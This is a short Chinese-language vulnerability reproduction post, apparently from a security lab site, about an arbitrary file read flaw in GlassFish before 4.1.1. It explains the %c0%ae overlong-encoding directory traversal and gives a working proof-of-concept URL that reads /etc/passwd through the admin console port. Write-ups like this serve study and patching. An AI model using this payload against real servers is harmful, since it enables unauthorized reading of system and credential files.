【初级】GlassFish 任意文件读取漏洞复现

漏洞描述:glassfish 是一款 java 编写的跨平台的开源的应用服务器。

java语言中会把 %c0%ae解析为 \uC0AE,最后转义为ASCCII字符的.(点)。利用 %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。所以 glassfish 这个 poc 实际上就是../../../../../../../../../../../etc/passwd。

影响版本:< 4.1.1(不含 4.1.1)

参考资料:

POC:

https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

漏洞复现

图片[1]-【初级】GlassFish 任意文件读取漏洞复现-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享